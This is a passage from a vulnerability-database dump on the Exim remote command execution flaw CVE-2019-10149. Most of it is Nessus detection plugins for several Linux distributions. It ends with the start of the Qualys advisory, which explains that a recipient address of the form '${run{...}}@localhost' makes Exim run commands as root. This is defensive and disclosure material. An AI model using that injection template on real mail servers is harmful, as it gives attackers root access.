thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"exim-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-debuginfo-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-greylist-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mon-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-mysql-4.91-1.20.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"exim-pgsql-4.91-1.20.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exim / exim-debuginfo / exim-greylist / exim-mon / exim-mysql / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-09T18:59:10", "description": "Exim team and Qualys report :\n\nWe received a report of a possible remote exploit. Currently there is\nno evidence of an active use of this exploit.\n\nA patch exists already, is being tested, and backported to all\nversions we released since (and including) 4.87.\n\nThe severity depends on your configuration. It depends on how close to\nthe standard configuration your Exim runtime configuration is. The\ncloser the better.\n\nExim 4.92 is not vulnerable.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", "title": "FreeBSD : Exim -- RCE in deliver_message() function (45bea6b5-8855-11e9-8d41-97657151f8c2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:exim"], "id": "FREEBSD_PKG_45BEA6B5885511E98D4197657151F8C2.NASL", "href": "https://www.tenable.com/plugins/nessus/125749", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125749);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\"CVE-2019-10149\");\n\n script_name(english:\"FreeBSD : Exim -- RCE in deliver_message() function (45bea6b5-8855-11e9-8d41-97657151f8c2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Exim team and Qualys report :\n\nWe received a report of a possible remote exploit. Currently there is\nno evidence of an active use of this exploit.\n\nA patch exists already, is being tested, and backported to all\nversions we released since (and including) 4.87.\n\nThe severity depends on your configuration. It depends on how close to\nthe standard configuration your Exim runtime configuration is. The\ncloser the better.\n\nExim 4.92 is not vulnerable.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.exim.org/static/doc/security/CVE-2019-10149.txt\"\n );\n # https://vuxml.freebsd.org/freebsd/45bea6b5-8855-11e9-8d41-97657151f8c2.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?48eb73b3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"exim>=4.87<4.92\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-09T19:22:06", "description": "The remote host is affected by the vulnerability described in GLSA-201906-01\n(Exim: Remote command execution)\n\n A vulnerability was discovered in how Exim validates recipient addresses\n in the deliver_message() function.\n \nImpact :\n\n A remote attacker could execute arbitrary commands by sending an email\n with a specially crafted recipient address to the affected system.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", "title": "GLSA-201906-01 : Exim: Remote command execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:exim"], "id": "GENTOO_GLSA-201906-01.NASL", "href": "https://www.tenable.com/plugins/nessus/125751", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201906-01.\n#\n# The advisory text is Copyright (C) 2001-2021 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125751);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/08\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"GLSA\", value:\"201906-01\");\n\n script_name(english:\"GLSA-201906-01 : Exim: Remote command execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-201906-01\n(Exim: Remote command execution)\n\n A vulnerability was discovered in how Exim validates recipient addresses\n in the deliver_message() function.\n \nImpact :\n\n A remote attacker could execute arbitrary commands by sending an email\n with a specially crafted recipient address to the affected system.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201906-01\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Exim users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=mail-mta/exim-4.92'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:exim\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"mail-mta/exim\", unaffected:make_list(\"ge 4.92\"), vulnerable:make_list(\"lt 4.92\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Exim\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-20T10:01:11", "description": "The Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-07T00:00:00", "title": "Debian DSA-4456-1 : exim4 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:exim4", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4456.NASL", "href": "https://www.tenable.com/plugins/nessus/125742", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4456. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125742);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/19\");\n\n script_cve_id(\"CVE-2019-10149\");\n script_xref(name:\"DSA\", value:\"4456\");\n\n script_name(english:\"Debian DSA-4456-1 : exim4 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The Qualys Research Labs reported a flaw in Exim, a mail transport\nagent. Improper validation of the recipient address in the\ndeliver_message() function may result in the execution of arbitrary\ncommands.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/exim4\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2019/dsa-4456\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade the exim4 packages.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u4.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:exim4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/07\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"exim4\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-base\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-config\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-heavy-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-daemon-light-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dbg\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"exim4-dev\", reference:\"4.89-2+deb9u4\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"eximon4\", reference:\"4.89-2+deb9u4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-06T10:09:42", "description": "According to its banner, the version of Exim running on the remote\nhost is between 4.87 and 4.91 (inclusive). It is, therefore, potentially \naffected by a remote command execution vulnerability. A flaw exists\nin the deliver_message() function that could allow an attacker to execute\narbitrary commands via a specially crafted email.", "edition": 19, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-06-06T00:00:00", "title": "Exim 4.87 < 4.92 Remote Command Execution", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-06T00:00:00", "cpe": ["cpe:/a:exim:exim"], "id": "EXIM_4_92.NASL", "href": "https://www.tenable.com/plugins/nessus/125737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125737);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2019-10149\");\n\n script_name(english:\"Exim 4.87 < 4.92 Remote Command Execution\");\n script_summary(english:\"Checks the version of the SMTP banner.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote mail server is potentially affected by a remote command \nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Exim running on the remote\nhost is between 4.87 and 4.91 (inclusive). It is, therefore, potentially \naffected by a remote command execution vulnerability. A flaw exists\nin the deliver_message() function that could allow an attacker to execute\narbitrary commands via a specially crafted email.\");\n # https://www.tenable.com/blog/cve-2019-10149-critical-remote-command-execution-vulnerability-discovered-in-exim\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?16a2ac7f\");\n # https://www.openwall.com/lists/oss-security/2019/06/05/4\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9de8f07f\");\n # https://www.openwall.com/lists/oss-security/2019/06/06/1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cf324cac\");\n script_set_attribute(attribute:\"see_also\", value:\"https://exim.org/static/doc/security/CVE-2019-10149.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"ftp://ftp.exim.org/pub/exim/exim4/ChangeLog\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Exim 4.92 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10149\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim 4.87 - 4.91 Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/06/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:exim:exim\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SMTP problems\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smtpserver_detect.nasl\");\n script_require_keys(\"Settings/ParanoidReport\");\n script_require_ports(\"Services/smtp\", 25);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smtp_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nport = get_service(svc:\"smtp\", default:25, exit_on_fail:TRUE);\n\nbanner = get_smtp_banner(port:port);\nif (!banner) audit(AUDIT_NO_BANNER, port);\nif (\"Exim\" >!< banner) audit(AUDIT_NOT_LISTEN, 'Exim', port);\n\nmatches = pregmatch(pattern:\"220.*Exim ([0-9\\._]+)\", string:banner);\nif (isnull(matches)) audit(AUDIT_SERVICE_VER_FAIL, 'Exim', port);\n\nversion = matches[1];\n# Underscore was added to the vesion\nversion = ereg_replace(string:version, pattern:'_', replace:'.');\n\nif (ver_compare(minver:'4.87', ver:version, fix:'4.92', strict:FALSE) < 0)\n{\n report =\n '\\n Banner : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 4.92';\n\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, 'Exim', port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2019-06-09T10:14:11", "description": "Exploit for linux platform in category remote exploits", "edition": 1, "published": "2019-06-07T00:00:00", "title": "Exim 4.87 < 4.91 - (Local / Remote) Command Execution Exploit #RCE", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10149"], "modified": "2019-06-07T00:00:00", "id": "1337DAY-ID-32848", "href": "https://0day.today/exploit/description/32848", "sourceData": "Qualys Security Advisory\r\n\r\nThe Return of the WIZard: RCE in Exim (CVE-2019-10149)\r\n\r\n\r\n========================================================================\r\nContents\r\n========================================================================\r\n\r\nSummary\r\nLocal exploitation\r\nRemote exploitation\r\n- Non-default configurations\r\n- Default configuration\r\nAcknowledgments\r\nTimeline\r\n\r\n Boromir: \"What is this new devilry?\"\r\n Gandalf: \"A Balrog. A demon of the Ancient World.\"\r\n -- The Lord of the Rings: The Fellowship of the Ring\r\n\r\n\r\n========================================================================\r\nSummary\r\n========================================================================\r\n\r\nDuring a code review of the latest changes in the Exim mail server\r\n(https://en.wikipedia.org/wiki/Exim), we discovered an RCE vulnerability\r\nin versions 4.87 to 4.91 (inclusive). In this particular case, RCE means\r\nRemote *Command* Execution, not Remote Code Execution: an attacker can\r\nexecute arbitrary commands with execv(), as root; no memory corruption\r\nor ROP (Return-Oriented Programming) is involved.\r\n\r\nThis vulnerability is exploitable instantly by a local attacker (and by\r\na remote attacker in certain non-default configurations). To remotely\r\nexploit this vulnerability in the default configuration, an attacker\r\nmust keep a connection to the vulnerable server open for 7 days (by\r\ntransmitting one byte every few minutes). However, because of the\r\nextreme complexity of Exim's code, we cannot guarantee that this\r\nexploitation method is unique; faster methods may exist.\r\n\r\nExim is vulnerable by default since version 4.87 (released on April 6,\r\n2016), when #ifdef EXPERIMENTAL_EVENT became #ifndef DISABLE_EVENT; and\r\nolder versions may also be vulnerable if EXPERIMENTAL_EVENT was enabled\r\nmanually. Surprisingly, this vulnerability was fixed in version 4.92\r\n(released on February 10, 2019):\r\n\r\nhttps://github.com/Exim/exim/commit/7ea1237c783e380d7bdb8...\r\nhttps://bugs.exim.org/show_bug.cgi?id=2310\r\n\r\nbut was not identified as a security vulnerability, and most operating\r\nsystems are therefore affected. For example, we exploit an up-to-date\r\nDebian distribution (9.9) in this advisory.\r\n\r\n\r\n========================================================================\r\nLocal exploitation\r\n========================================================================\r\n\r\nThe vulnerable code is located in deliver_message():\r\n\r\n6122 #ifndef DISABLE_EVENT\r\n6123 if (process_recipients != RECIP_ACCEPT)\r\n6124 {\r\n6125 uschar * save_local = deliver_localpart;\r\n6126 const uschar * save_domain = deliver_domain;\r\n6127\r\n6128 deliver_localpart = expand_string(\r\n6129 string_sprintf(\"${local_part:%s}\", new->address));\r\n6130 deliver_domain = expand_string(\r\n6131 string_sprintf(\"${domain:%s}\", new->address));\r\n6132\r\n6133 (void) event_raise(event_action,\r\n6134 US\"msg:fail:internal\", new->message);\r\n6135\r\n6136 deliver_localpart = save_local;\r\n6137 deliver_domain = save_domain;\r\n6138 }\r\n6139 #endif\r\n\r\nBecause expand_string() recognizes the \"${run{<command> <args>}}\"\r\nexpansion item, and because new->address is the recipient of the mail\r\nthat is being delivered, a local attacker can simply send a mail to\r\n\"${run{...}}@localhost\" (where \"localhost\" is one of Exim's\r\nlocal_domains) and execute arbitrary commands, as root\r\n(deliver_drop_privilege is false, by default):\r\n\r\n[...]\r\n\r\n\r\n========================================================================\r\nRemote exploitation\r\n========================================================================\r\n\r\nOur local-exploitation method does not work remotely, because the\r\n\"verify = recipient\" ACL (Access-Control List) in Exim's default\r\nconfiguration requires the local part of the recipient's address (the\r\npart that precedes the @ sign) to be the name of a local user:\r\n\r\n[...]\r\n\r\n------------------------------------------------------------------------\r\nNon-default configurations\r\n------------------------------------------------------------------------\r\n\r\nWe eventually devised an elaborate method for exploiting Exim remotely\r\nin its default configuration, but we first identified various\r\nnon-default configurations that are easy to exploit remotely:\r\n\r\n- If the \"verify = recipient\" ACL was removed manually by an\r\n administrator (maybe to prevent username enumeration via RCPT TO),\r\n then our local-exploitation method also works remotely.\r\n\r\n- If Exim was configured to recognize tags in the local part of the\r\n recipient's address (via 